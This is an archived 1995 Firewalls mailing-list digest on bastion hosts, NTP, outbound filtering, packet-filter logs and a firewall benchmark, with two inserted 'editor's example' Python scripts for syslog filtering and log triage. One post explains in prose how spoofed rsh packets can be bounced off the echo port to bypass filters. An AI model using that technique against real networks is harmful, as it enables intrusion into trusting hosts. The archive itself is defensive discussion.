From firewalls-owner Tue May 16 06:01:40 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA18071 for firewalls-outgoing; Tue, 16 May 1995 05:54:55 -0700 Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA18066 for ; Tue, 16 May 1995 05:54:52 -0700 Received: from relay.tis.com by relay3.UU.NET with SMTP id QQypyx10325; Tue, 16 May 1995 08:54:30 -0400 Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0) id sma002530; Tue, 16 May 95 08:51:40 -0400 Received: from (illuminati.tis.com) by tis.com (4.1/SUN-5.64) id AA08724; Tue, 16 May 95 08:53:08 EDT Received: by (4.1/illuminati) id AA03920; Tue, 16 May 95 09:00:36 EDT From: "Marcus J. Ranum" Message-Id: <3920.9505161300@illuminati> Subject: Re: NTP on a bastion system To: mitubori@tsi.co.jp Date: Tue, 16 May 1995 09:00:36 -0400 (EDT) Cc: Firewalls@GreatCircle.com In-Reply-To: <9505160511.AA29379@s_kenkyu.tsi.co.jp> from "mitubori@tsi.co.jp" at May 16, 95 02:11:37 pm Organization: Trusted Information Systems, Inc. Glenwood, MD Phone: 301-854-6889 Coredump: Infocalypse Now!!! Content-Type: text Content-Length: 431 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>Has anyone known of, or had experience with, tools that
>relay traffic back and forth between two NTP servers?
>They must run on a bastion system (FWTK, SunOS 4.1.4).

Ntpd is pretty good for the job. :) Firewalls make good network clocks, especially if you have more than one of them.
Just have the firewall sync with a timesource outside, and have inside systems get clocking from the firewall and spread it internally. mjr. From firewalls-owner Tue May 16 07:01:44 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA18983 for firewalls-outgoing; Tue, 16 May 1995 06:35:48 -0700 Received: from hatteras.ch.inri.com (hatteras.ch.inri.com [198.202.184.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA18974 for ; Tue, 16 May 1995 06:35:43 -0700 Received: from assateague (assateague.ch.inri.com [198.202.184.111]) by hatteras.ch.inri.com (8.6.12/8.6.6) with SMTP id JAA04674; Tue, 16 May 1995 09:36:06 -0400 Date: Tue, 16 May 1995 09:36:06 -0400 Message-Id: <199505161336.JAA04674@hatteras.ch.inri.com> X-Sender: wlb@hatteras.ch.inri.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: claudio@fly.CNUCE.CNR.IT (Claudio Telmon), firewalls@GreatCircle.COM From: wbunting@inri.com (Bill Bunting) Subject: Re: Why control outbound traffic? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Good points. The main reason for original posting was to emphasize numbers 2 and 3 and to point out that each site must make this determination. In the situation you present below, you allow your users to install and use untrusted/untested code (which may happen no matter how hard you try to prevent it). Rick Smith also did a good job of addressing some of the other reasons to control outgoing access such as accounting/auditing and corporate sensitive or classified data. In the end, what policy is chosen depends on the level of risk you are willing to accept. As was pointed out, statement one is incorrect (or at least unclear) without statements two and three. 2. Any risk is from your users. Can you trust your users? Are your users responsible? 3. Cost. Can you afford to allow your users unrestricted external access? 
[Opinions are mine and may not represent the opinions of my employer... etc...]

>
>There is a problem with outgoing connections: clients can be bugged as much
>as servers (maybe more), and connection + bug = security problem.
>The only differences between inbound and outbound connections IMHO are:
>- Outbound connections are decided from the inside. This means that the time
>and the destination host are decided by the client. This requires a bit of
>social engineering to let the client connect to the "right" server, or some
>rerouting, maybe. With WWW this isn't a big problem: just add a link in the
>right document.
>- Outbound connections are usually started without special privileges. This
>may require some additional work to become superuser.
>- Clients are managed by users :)
>
>Am I wrong?
>
>- Claudio
>
>

From firewalls-owner Tue May 16 07:31:41 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA19676 for firewalls-outgoing; Tue, 16 May 1995 07:21:39 -0700 Received: from disperse.demon.co.uk (disperse.demon.co.uk [158.152.1.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA19671 for ; Tue, 16 May 1995 07:21:36 -0700 Received: from post.demon.co.uk by disperse.demon.co.uk id aa27421; 16 May 95 14:24 GMT-60:00 Received: from hanover.demon.co.uk by post.demon.co.uk id aa07699; 16 May 95 14:24 GMT-60:00 To: jay@pcc.com Cc: firewalls@greatcircle.com From: benjamin@hanover.demon.co.uk MMDF-Warning: Parse error in original version of preceding line at post.demon.co.uk Date: Tue, 16 May 95 14:13:45 Subject: Re: Packet Filtering, and FTP Customizations Message-ID: <2.51.881397C7B.BenMail@hanover.demon.co.uk> X-Mailer: BenMail 2.51 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> I'm trying to use packet filtering on our Cisco 2501 router to
> implement some security.
> I'd like to allow FTP clients to access the
> outside world, but will run into the incoming connection problem
> described in the FAQ and the C&B Firewalls book.
> The trick is to use a PASV type client...

If people are using Netscape, they could do their FTP through this, since it
does FTP the PASV way.. PASV effectively does what you described as reversing
the direction of the connection (that sounds funny) - so you can use normal
filtering.

-Benjamin
--
Windows (n.) - Self propagating virus. Payload: Consumes large amounts of
disk space. Stealth: None. Method of Propagation: Hype/Myth

From firewalls-owner Tue May 16 08:01:57 1995
Date: Tue, 16 May 1995 08:38:19 -0400 (EDT)
From: Rick Romkey
Message-Id: <199505161238.IAA11688@maddie.atlantic.com>
To: billcurr@cyberspace.com (Bill Curr)
Cc: Firewalls@GreatCircle.COM
In-Reply-To: <9505152359.AA09419@armitage.cyberspace.com> from "Bill Curr" at May 15, 95 04:59:35 pm
Subject: Re: WebServers and Firewalls

> >BorderWare seems decent considering it's turnkey but I worry about
> >limitations. Their attitude is "we know best". If I want to run
> >Netscape's Server Proxy or some other non-BorderWare proxy I can't.
>
> Excuse my ignorance on firewalls in general, but this leads me to inquire what
> is the relationship between a firewall and a web server? I have heard
> suggestions to put a web server "in front" and/or "behind" a firewall. By
> design, usually web servers are passing out information for every and anybody.
> I am looking at getting a web server (NetScape Commerce Server) with the idea
> of having some areas "off-limits" to the general public. It would not need
> heavy-duty security, more just a password to discourage casual access. But
> what if we wanted to have high security, say, having folks access an FTP
> library from our homepages?

The built-in servers that ship with BorderWare (Janus) are touted as secure
servers. That may or may not be true of other firewalls. The reason that the
Border folks claim theirs is secure is because both are stripped-down versions
(for FTP, it only runs in anonymous mode or requires a challenge/response. For
httpd, it runs a version which only supports the GET method). Both are
"chrooted" and have no access to the remaining file systems.

The security we are talking about here is not a person managing to get to
protected areas of the web or ftp server, but instead the security of someone
managing to break into the program and begin hacking the firewall to attempt
further break-ins to the private network.

The security you are talking about is a bit out of the scope of this
list... perhaps you should try some of the "Web" discussion groups.
-Rick
----------------------------------------------------------------------------
Rick E Romkey        | A T L A N T I C                  | Internet
pokey@atlantic.com   | Computing Technology Corporation | Specialists
(203) 257-7163       | http://www.atlantic.com/         |
-----------------------------------------------------------------------------

From firewalls-owner Tue May 16 08:31:58 1995
Date: Tue, 16 May 95 16:36:37 +0100
From: detzel@des3.u-strasbg.fr (???)
Message-Id: <9505161536.AA03073@des3.u-strasbg.fr>
To: firewalls@GreatCircle.COM
Cc: detzel@isis.u-strasbg.fr
Subject: Re: Why control outbound traffic / Sharing information among different secured network

From: amolitor@anubis.network.com (Andrew Molitor)
> I haven't seen anyone mention it, so I will. Certain classes of
>attacks involve doing various things to get some code running on an internal
>host which constructs things which either are or which look like outbound
>connections. Remember the 'get INN or cnews to run arbitrary code' thing?

Sorry, but as a novice in firewalls I can't see what you mean by 'get INN or
cnews to run arbitrary code'?

According to what I read up to now, there's NO CONCRETE reason to fear
outbound connections, right? The only warning is:

>In practice, it all comes down to corporate policy. If the internal
>network contains information that is to be protected from release to
>the public (i.e. the Internet) then "unrestricted" access is clearly a
>bad thing.

It could be a threat only if users inside the secured network create outbound
traffic which involves secret information (through ftp for example, or
sending personal mail).

And what about mounting file systems? We are about to build a firewall but
it'll be pretty hard (I think) to handle sharing information between networks:
a few of our users have accounts on different secure/unsecure systems. Up to
now they've mounted their directories through NFS, which won't be available
through our firewall. Any idea concerning secure information sharing?

Thanks in advance

-vincent

From firewalls-owner Tue May 16 09:02:06 1995
Message-Id: <9505161550.AA25831@ccae-sv.inesc.pt>
From: "Ricardo Pereira"
To: firewalls@GreatCircle.com
Date: Tue, 16 May 1995 17:48:31 +0000
Subject: A better syslogd ?

Does anyone know about an implementation of a better syslog daemon? By better
I mean more flexibility in the rules. I know TIS syslogd, and it does add two
"add-on"s: the regular expression filters, and the possibility to execute
programs upon receipt of certain logs. This is useful, but regexps may be a
bit "heavier" than I would need.

This is what I would consider nice...

- Interpret facility and level as simple integers, not tied to some
  definitions, and do filtering based on them. "Standard" syslogd imposes a
  limited number of facilities, and filtering is based on "level higher
  than"...

- A more complete management of log files. This has been largely discussed in
  the fwtk mailing list, and I understand how to do it, but it would be nice
  if it could be integrated with the daemon itself.

I looked at the sources of syslogd and they seem simple enough to modify, but
I would like to collect some opinions regarding:

- Different versions of syslogd
- What facilities an improved syslogd should implement
- Any other thing related to this

In order to keep the list members happy, I suggest you reply to me directly
and, based on the information I get, I will post some conclusions later.

Thanks...
__________________________________________________________________
Ricardo Jorge Pereira                          Network Consultant
Centro de Comunicacoes em Ambientes Empresariais
Av. Duque d'Avila 23, Apartado 10105, 1017 Lisboa Codex, Portugal
Telef : +351 1 3100069    Fax : +351 1 3100068
email : ricardo.pereira@inesc.pt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft is not the answer, Microsoft is the question. No is the answer.
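As an added illustration (editor's example, not code from Ricardo's post or from any syslogd), here is the filtering model he asks for in a few lines of Python: facility and level are taken as bare integers from the PRI, a rule matches an exact set of levels rather than only "this level or worse", and a rule may carry a regexp and an action the way the TIS add-ons do. The rule table, action strings, facility-12 rule and sample datagrams are all constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Assumes BSD-style "<PRI>" framing on the datagram, where PRI = facility * 8 + level.
PRI_RE = re.compile(r"^<(\d{1,3})>(.*)$", re.S)
MAX_PRI = 23 * 8 + 7  # highest facility number (23) at the least urgent level (7)


def parse_pri(datagram: str) -> Optional[Tuple[int, int, str]]:
    """Split a datagram into (facility, level, text); None if it is not syslog-framed."""
    m = PRI_RE.match(datagram)
    if m is None:
        return None
    pri = int(m.group(1))
    if pri > MAX_PRI:
        return None
    return pri >> 3, pri & 7, m.group(2)


def level_at_most(level: int) -> frozenset:
    """Classic syslog.conf semantics: this severity or anything more urgent."""
    return frozenset(range(level + 1))


@dataclass(frozen=True)
class Rule:
    name: str
    facilities: Optional[frozenset]       # None matches any facility number
    levels: frozenset                     # exact set of levels, 0 = emerg .. 7 = debug
    pattern: Optional["re.Pattern"] = None
    action: str = "file:/var/log/messages"  # hypothetical action spec, recorded, not run

    def matches(self, facility: int, level: int, text: str) -> bool:
        if self.facilities is not None and facility not in self.facilities:
            return False
        if level not in self.levels:
            return False
        return self.pattern is None or self.pattern.search(text) is not None


# Hypothetical rule table. Facility 12 has no name in a standard syslog.conf,
# which is exactly the case where matching on the integer helps.
RULES = [
    Rule("page-admin", frozenset({4, 10}), level_at_most(6),
         re.compile(r"REFUSED|BAD SU"), "exec:/usr/local/sbin/page-admin"),
    Rule("errors", None, level_at_most(3), None, "file:/var/log/errors"),
    Rule("notices-only", None, frozenset({5}), None, "file:/var/log/notices"),
    Rule("facility-12", frozenset({12}), level_at_most(7), None, "file:/var/log/fac12"),
]

# Constructed sample datagrams (facility.level noted per line).
SAMPLE_DATAGRAMS = [
    "<38>May 16 17:50:15 beatle login: ROOT LOGIN REFUSED FROM 192.0.2.9",   # 4.6
    "<34>May 16 17:50:20 beatle su: BAD SU ricardo to root on /dev/ttyp0",   # 4.2
    "<13>May 16 17:51:01 beatle wall: interactive message",                  # 1.5
    "<86>May 16 17:52:07 beatle ftpd: ANONYMOUS FTP LOGIN FROM 192.0.2.9",   # 10.6
    "<187>May 16 17:53:44 beatle lpd: printer offline",                      # 23.3
    "<101>May 16 17:54:00 beatle xntpd: synchronized to 192.0.2.1",          # 12.5
    "May 16 17:55:00 beatle noise: datagram without a PRI",                  # unframed
]


def route(datagrams: List[str], rules: List[Rule]) -> List[Tuple[str, List[str]]]:
    """Return (text, [names of matching rules]) per datagram; unframed input is tagged."""
    out = []
    for d in datagrams:
        parsed = parse_pri(d)
        if parsed is None:
            out.append((d, ["unparsed"]))   # keep it visible rather than dropping it
            continue
        facility, level, text = parsed
        out.append((text, [r.name for r in rules if r.matches(facility, level, text)]))
    return out


def actions_for(datagram: str, rules: List[Rule]) -> List[str]:
    """Action specs a daemon would carry out for one datagram."""
    parsed = parse_pri(datagram)
    if parsed is None:
        return []
    facility, level, text = parsed
    return [r.action for r in rules if r.matches(facility, level, text)]


if __name__ == "__main__":
    for text, names in route(SAMPLE_DATAGRAMS, RULES):
        print(f"{str(names or ['-']):40} {text}")
```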
From firewalls-owner Tue May 16 09:36:29 1995
Date: Tue, 16 May 1995 10:49:40 -0500
From: Rick Smith
Message-Id: <199505161549.KAA24388@shade.sctc.com>
To: firewalls@greatcircle.com
Cc: smith@sctc.com
Subject: Monitoring outgoing traffic

I wrote:

>>At the very least, a responsible organization will monitor outgoing traffic
>> in some fashion to provide confidence that people comply with information
>>protection policies.

David M Funk replied:

>Our organization has proprietary information that is not releasable to the
>public. This information resides in desks and computers. We do not monitor
>the briefcases and pockets of employees leaving the building. Are you
>saying that this is not a responsible organization. I think not

I don't generally think of my pocket or briefcase as being a forum for the
"public release" of information. The Internet is.

Besides, computers and people have different trust properties.

How often do you stick a sensitive document in a briefcase or pocket by
accident? Rarely, I expect. But even if you did, you still had *lots* of
opportunities to discover the error and then protect the document from
compromise. (thanks, Beede)

On the other hand, a couple of simple mistakes can transmit almost any
information to the Internet, and even publish it where adversaries will see
it. Clever adversaries might even manage to fool your computers into
transmitting sensitive data. And once it's past the firewall there's no way
you can reliably detect and un-do the mistake before it appears in the news.

I don't know of any way to monitor traffic automatically and block bad
messages with 100% reliability. But some simple checks will catch large
classes of mistakes and bunglers, which is a real improvement.

Rick.
smith@sctc.com    roseville, minnesota

From firewalls-owner Tue May 16 09:56:33 1995
Date: Tue, 16 May 1995 08:40:43 +0100
From: John Pettitt
Subject: Livingston filter trouble take II
To: Firewalls@GreatCircle.COM

Here is some more info on the question I posted yesterday about seeing
inside-sourced packets on the outside interface.

The outside LAN is 198.67.38.00 (it's an ether belonging to internex); inside
is 204.69.144.0. I'm seeing packets with inside "from addresses" on the
outside interface.

Here is my filter table:

 1 deny   204.69.144.0/24  0.0.0.0/0        ip   log
 2 permit 0.0.0.0/0        204.69.144.0/24  tcp  estab
 3 permit 0.0.0.0/0        204.69.144.1/32  tcp  dst eq 25   log
 4 permit 0.0.0.0/0        204.69.144.2/32  tcp  dst eq 25   log
 5 permit 0.0.0.0/0        204.69.144.1/32  tcp  dst eq 80
 6 permit 0.0.0.0/0        204.69.144.1/32  tcp  dst eq 443
   [other rules deleted for security reasons]
28 deny   0.0.0.0/0        0.0.0.0/0        ip   log

Mostly my log entries are denys from rule 28 to stuff I don't allow like ftp.
However I see some rule 1 denys (see below for some examples):

May 3 16:06:43 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 129.4.31.133.1713 seq 3A857AE9, ack 0x356A4C56, win 4096, FIN PUSH ACK , 43 bytes
May 4 08:38:16 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 128.186.52.15.1681 seq 26D18730, ack 0x39B4A371, win 4096, ACK , 512 bytes
May 4 20:18:31 firebreak.software.net 1 deny: icmp from 204.69.144.2 to 165.247.46.5 type Echo Reply
May 5 09:25:52 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 139.78.228.118.1095 seq 1BF356E6, ack 0x78F66, win 4096, FIN PUSH ACK , 242 bytes
May 7 15:46:41 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 198.69.200.107.1426 seq 66C0B001, ack 0x4B19C2BF, win 4096, PUSH ACK , 29 bytes
May 8 22:17:35 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 137.192.199.113.1810 seq 6DB612BB, ack 0x5188A270, win 4096, ACK , 512 bytes
May 9 06:47:10 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 199.166.232.82.1188 seq 727CA502, ack 0x53B155F5, win 4096, FIN PUSH ACK , 228 bytes

I have ruled out another path to the outside. Am I under attack or is there a
bug?

Regards

Perplexed in menlo park.
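One check a practitioner would run over these entries, added here as an editor's example and not part of John's post: parse the quoted rule-1 denies and sort them by whether they look like an inside server answering an outside client (inside source, a source port that rules 3-6 serve, ACK set and no SYN) or like a packet merely claiming an inside address, which is the case ingress anti-spoofing exists for. The inside net and served ports come from the rule table above; the log field layout is taken from the quoted lines and nothing else about the Livingston is assumed; the last two log lines are constructed to exercise the other branches.

```python
import ipaddress
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

INSIDE = ipaddress.ip_network("204.69.144.0/24")
# (host, port) pairs that rules 3-6 permit outside clients to reach.
SERVED = {("204.69.144.1", 25), ("204.69.144.2", 25),
          ("204.69.144.1", 80), ("204.69.144.1", 443)}

# Sample log: the seven rule-1 denies from the post, then two constructed lines
# (an inside-source SYN to port 7, and an outside-source SYN denied by rule 28).
SAMPLE_LOG = """\
May 3 16:06:43 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 129.4.31.133.1713 seq 3A857AE9, ack 0x356A4C56, win 4096, FIN PUSH ACK , 43 bytes
May 4 08:38:16 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 128.186.52.15.1681 seq 26D18730, ack 0x39B4A371, win 4096, ACK , 512 bytes
May 4 20:18:31 firebreak.software.net 1 deny: icmp from 204.69.144.2 to 165.247.46.5 type Echo Reply
May 5 09:25:52 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 139.78.228.118.1095 seq 1BF356E6, ack 0x78F66, win 4096, FIN PUSH ACK , 242 bytes
May 7 15:46:41 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 198.69.200.107.1426 seq 66C0B001, ack 0x4B19C2BF, win 4096, PUSH ACK , 29 bytes
May 8 22:17:35 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 137.192.199.113.1810 seq 6DB612BB, ack 0x5188A270, win 4096, ACK , 512 bytes
May 9 06:47:10 firebreak.software.net 1 deny: TCP from 204.69.144.1.443 to 199.166.232.82.1188 seq 727CA502, ack 0x53B155F5, win 4096, FIN PUSH ACK , 228 bytes
May 9 07:00:00 firebreak.software.net 1 deny: TCP from 204.69.144.9.514 to 204.69.144.2.7 seq 00000001, ack 0x0, win 4096, SYN , 44 bytes
May 9 07:00:05 firebreak.software.net 28 deny: TCP from 192.0.2.77.1234 to 204.69.144.1.21 seq 00000002, ack 0x0, win 4096, SYN , 44 bytes
"""

_HDR = r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) (?P<rule>\d+) (?P<action>\w+): "
TCP_RE = re.compile(_HDR + r"TCP from (?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) "
                    r"to (?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+) .*win \d+, "
                    r"(?P<flags>[A-Z ]+?)\s*, (?P<bytes>\d+) bytes$")
ICMP_RE = re.compile(_HDR + r"icmp from (?P<src>\d+\.\d+\.\d+\.\d+) "
                     r"to (?P<dst>\d+\.\d+\.\d+\.\d+) type (?P<itype>.+)$")


def parse_entry(line: str) -> Optional[Dict]:
    """Parse one log line into a dict; None if the line is not in a known layout."""
    m = TCP_RE.match(line)
    if m:
        e = m.groupdict()
        e.update(proto="tcp", sport=int(e["sport"]), dport=int(e["dport"]),
                 flags=frozenset(e["flags"].split()))
        return e
    m = ICMP_RE.match(line)
    if m:
        e = m.groupdict()
        e.update(proto="icmp")
        return e
    return None


def classify(e: Dict) -> str:
    src = ipaddress.ip_address(e["src"])
    if src not in INSIDE:
        return "outside-sourced"           # not a rule-1 case at all
    if e["proto"] == "tcp":
        from_served = (e["src"], e["sport"]) in SERVED
        if from_served and "ACK" in e["flags"] and "SYN" not in e["flags"]:
            # Looks like an inside server answering an outside client mid-connection,
            # i.e. traffic on its way out. If the table is applied to packets in both
            # directions, rule 1 matches exactly this.
            return "reply-from-served-port"
    elif e["proto"] == "icmp" and e["itype"].strip().lower().endswith("reply"):
        return "icmp-reply"
    # Inside address on something no inside server would send in answer to a
    # permitted connection: the packet only claims to be from inside.
    return "possible-spoofed-source"


def triage(log_text: str) -> List[Tuple[str, str]]:
    rows = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        e = parse_entry(line)
        if e is None:
            rows.append((line, "unparsed"))
            continue
        rows.append((f"rule {e['rule']} {e['proto']} {e['src']} -> {e['dst']}", classify(e)))
    return rows


def summarize(log_text: str) -> Dict[str, int]:
    return dict(Counter(kind for _, kind in triage(log_text)))


if __name__ == "__main__":
    for who, kind in triage(SAMPLE_LOG):
        print(f"{kind:24} {who}")
    print(summarize(SAMPLE_LOG))
```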
John Pettitt           jpp@software.net          VP Engineering
+1 415 473 3065 (V)    CyberSource Corporation   +1 415 473 3066 (F)

From firewalls-owner Tue May 16 10:31:27 1995
Date: Tue, 16 May 95 17:16:02 GMT
Message-Id: <9505161716.AA11726@cixgate>
To: firewalls@greatcircle.com
From: Jim_Sanchez@3mail.3Com.COM (Jim Sanchez)
Subject: Information on Proxy Servers Wanted

I have a number of customers who want to get internet connectivity from their
existing (non-registered) network. Some of them have an old class C address
and their actual address has grown much beyond what that will accommodate. The
customers are typically PC, MAC, and Unix users so any solutions would need to
support this kind of base. A piece of dedicated hardware would be provided for
the proxy server. Please respond directly since I do not subscribe to this
list.

Thanks
Jim

Jim Sanchez, Network Consultant
3Com Corporation
Bellevue, Washington
(206)455-8530 (work)
(206)836-0105 (Home)

From firewalls-owner Tue May 16 11:00:09 1995
Date: Tue, 16 May 95 13:10:21 -0400
Message-Id: <9505161710.AA16669@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Re: Why control outbound information

Vincent writes:

>According to what I read up to now, there's NO CONCRETE reason to fear
>outbound connections, right ?

Look at it as "belt and suspenders". Certainly if you have a perfect inbound
filter and all of the people on the inside are completely trustworthy, you
need have no fear. However...

Consider that both the Rahul attack of a year ago, the more recent Mitnick
attack, and at least one other major incident involved placing an unauthorized
process on an inside machine and using it to pass information to the outside.
While a really, *really* good filter might have stopped them from getting in,
all it takes is one modem/outsourced janitor/unreleased CERT discovery/awsh*t
to put an outgoing process on a machine.

Single-fail.die.die.die is not a good philosophy if you really need a firewall
in the first place. IMNSHO an installation with a wall should be at least
single-fail-operational/dual-fail-safe and an outgoing filter is a good place
to have a block.

Warmly,
Padgett

From firewalls-owner Tue May 16 11:06:10 1995
Date: Tue, 16 May 1995 15:22:09 GMT
From: Dave Roberts
Message-Id: <3007@saa-cons.co.uk>
To: firewalls@greatcircle.com
Subject: 1, Bastion host configuration

I am about to embark on setting up a firewall. I have read "The Book" and
waded through this list for a couple of months, and have a question about
configuring up the bastion host.

In "The Book", the bastion host runs a minimal set of programs and effectively
allows the internal net to connect to the Internet (without going into all the
necessary restrictions). Before I picked the book up, and subscribed to this
list, I had an idea of having the machine allow a selected number of users
onto it, and pass the requests out that way. This, to me, had the advantage of
limiting even further the exposure of the internal network, upon which there
may be unsecure machines. It would only need to pass back packets for telnet,
and service X requests.

I appreciate that more users = more accounts to crack and therefore a greater
risk of exposure due to poor passwords, but is the "C&B" method that much more
secure that it outweighs any advantages of "my" method, if indeed you feel my
method *has* any advantages.

At the end of the day I want to provide net access to a few selected
"trustable" users, and protect a network of unsecure machines with users who
don't believe in security internally.
I'd rather not get into issues of setting up a security policy chastising
users for having poorly configured hosts (a lot of PCs running some form of
Unix).

Also: I don't think that my budget is gonna be vast, so I think 2 machines
might be out of the question. How about using C&B plan A, (P87) with an extra
router on the inside connection:-

                +--------+      +--------------+      +--------+     Internal
Internet -------+ Router +------+   Gateway    +------+ Router +---- Network
                +--------+      +--------------+      +--------+

So, it's sort of a Plan C, without the internal gateway.

Please tear this to shreds. All replies would be most welcome.

- Dave

-------------------+-------------------------------------------------------
Dave Roberts       | Don't `surf the net', it's sad. Get a board and surf
djr@saa-cons.co.uk | the break.             "I feel better than James Brown"

From firewalls-owner Tue May 16 12:08:55 1995
Date: Tue, 16 May 1995 14:38:22 -0400
From: ari@soscorp.com (Ari Shamash)
Message-Id: <199505161838.OAA13270@fearless.soscorp.com>
To: Scott Barman
Cc: firewalls@GreatCircle.COM
Subject: Requesting "echo"

>>>>> On Thu, 11 May 1995 14:20:20 -0400 (EDT), Scott Barman said:

Scott> Why not use echo (port 7) or chargen (19) to see if one
Scott> could get a response out of a system?  I can see using
Scott> it when there may be a likelihood that I may not get a
Scott> response from the ping.

Not blocking the echo port (port 7) or somehow preventing packets with spoofed
IP addresses from entering the system could be even more disastrous to a site.
Consider this scenario:

A packet enters the network with a spoofed IP address (say of the backup
server), with source port 514 (port for remote shell), and the payload
consisting of a valid RSH-type "header" and content. This packet then gets
echoed back to the backup server with the IP source address of the client. If
the server trusts this host (and most backup hosts must, so remote dumps can
happen), then what?

Clearly, blocking packets with internal source IP addrs at the outside
boundary defeats this kind of attack (as well as other attacks based on source
IP addrs), but this does show that the echo service can be used to bypass
packet filters.

Ari Shamash
SOS Corporation

From firewalls-owner Tue May 16 12:32:25 1995
Date: Tue, 16 May 1995 15:04:59 -0400 (EDT)
From: nto2584@tserver.dsac.dla.mil (Steven Payne)
Message-Id: <9505161904.AA06497@tserver.dsac.dla.mil>
Subject: Re: NTP on a bastion system
To: mjr@tis.com (Marcus J. Ranum)
Cc: firewalls@greatcircle.com
In-Reply-To: <3920.9505161300@illuminati> from "Marcus J. Ranum" at May 16, 95 09:00:36 am

> >Has anyone known and experienced about some tools that
> >relay traffic back and forth between two NTP servers.
> >They must run on a bastion system (FWTK,SunOS4.1.4).
>
> Ntpd is pretty good for the job. :)
>
> Firewalls make good network clocks, especially if you have
> more than one of them. Just have the firewall sync with a timesource
> outside, and have inside systems get clocking from the firewall and
> spread it internally.
>
> mjr.

We are using xntpd among the two hosts on our class C with the firewall acting
as a server to both hosts. The router allows the firewall access to our class
C net, so we needed to use the firewall as a server. The firewall itself is
using the kerberos master server as the xntpd master server. It is absolutely
essential for the system clocks to be in sync for kerberos to operate. If not
then the tickets issued will be out of sync and not operate or, better yet,
expire (at least for 5 minute root instance tickets).

Marcus is right, they make good clocks. We are using xntpd in just the fashion
that Marcus describes.
steve payne
spayne@dsac.dla.mil
comm 614-692-9991

From firewalls-owner Tue May 16 12:50:25 1995
Date: Tue, 16 May 1995 14:59:30 -0400 (EDT)
From: nto2584@tserver.dsac.dla.mil (Steven Payne)
Message-Id: <9505161859.AA06462@tserver.dsac.dla.mil>
Subject: Firewall performance from neal nelson RTE
To: firewalls@greatcircle.com

Hi,

I promised the report from the neal nelson rte to the group when we had stats
available. We had the performance measurement group run the benchmarks on our
firewall and here's what we got. I will first describe our 486 configuration:

486 DX 33, 12 meg of ram, trident VLB VGA 1meg card, 1 340 meg IDE hard
drive, one 3.5 floppy. NO level 2 cache.

Subject: Firewall stress test

An RTE was run to do the maximum number of rlogins and ftp concurrent users to
host_A, host_B, and host_C systems. The user mix was 14 ftp users, seven to
the host_B system and seven to host_A system, and 51 rlogin users, 27 to the
host_B system, 10 to host_A, 14 to host_C. The host_B and host_A were max'ed
but the gatekeeper system was not max'ed until the 14 rlogin users were added
to host_C. In this concurrent users test the gatekeeper prompt was not reached
with 70 users. One or two users can squeeze in above 65 users depending on how
busy the LAN was (day time vs evening). The test ran successfully in 9 minutes
with 4 minutes included for user synchronization.

The manual rlogin to host_C took 47 seconds to complete during the test; the
rte response time average for the rlogins was 40 seconds, a 43% degradation
when compared with the non-concurrent user test. The firewall performance
degrades abruptly as the number of users increases over 65 even with the
maxuser parameter on the gatekeeper being up'ed to 129.

The number of non-concurrent users was 300 rlogin and 120 ftp users taking 80
minutes to complete successfully, with response time for ftp of 28 seconds and
28 seconds for rlogin.

Summary:

The firewall can accommodate 65 concurrent users with response time of 40
seconds per rlogin, and 420 non-concurrent users over 80 minutes with response
time of 28 seconds per rlogin.

N. Nelson & Assoc.        Summary Users Within Script-Interval
Time 15:33   Date 05/15/95   Program k1bn73
Concurrent users Firewall stress test                               Page 1

Script-                               Active   No. of   Avg for
Interval  Description                 Users    Samples  1 user
 7-1      Rlogin to the host_B system   65       27     125.59
 8-1      Ftp to the host_B system      65        7     134.25
 9-1      Rlogin to the host_A system   65       10      72.75
10-1      Ftp to the host_A system      65        7      46.60
11-1      Rlogin to the host_C system   65       14      40.85

N Nelson & Assoc.         Summary Users Within Script-Interval
07:31:48   Date 05/16/95   Program k1bn73
Non-concurrent users Firewall stress test                           Page 1

Script-                               Active   No. of   Avg for
Interval  Description                 Users    Samples  1 User
 3-1      Rlogin to the host_B system    4      150      23.23
 4-1      Ftp to the host_B system       4       60      31.97
 5-1      Rlogin to the host_A system    4      150      32.00
 6-1      Ftp to the host_A system       4       60      23.35

The size of each ftp was 237,568 bytes.

host_A is a 486 running SCO ODT 3.0
host_B is a 486 running BSDI version 2
host_C is a 700 series HP running HP-UX vers 9.04

The Firewall is running BSDI with a trimmed down kernel, with most of the
unused drivers removed from the kernel. I was going to post the configuration
of the kernel but I am not sure that's a good idea as it might show where we
are vulnerable if I did not remove a certain module. Is this wise or should I
show it to you?

